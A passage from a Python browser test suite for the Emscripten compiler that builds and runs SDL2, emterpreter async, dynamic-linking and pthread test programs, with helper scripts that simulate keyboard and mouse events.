self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?712', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?572')
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]'])
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1'], timeout=60)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''), # use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''), # pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''), # similar, but without a mem init file, everything is sync and simple
]:
print 'test on', opts, args, code
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print opts
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = Module.print;
Module.print = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
int result = 2;
REPORT_RESULT();
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
int result = 1;
REPORT_RESULT();
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=10000', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print opt, debug, f32
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=60)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the rest of the remaining GCC atomics after the two above tests.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print str(opt) + ' ' + str(pthreads)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1', '--proxy-to-worker']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'NO_EXIT_RUNTIME=1'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=20)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=268435456'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
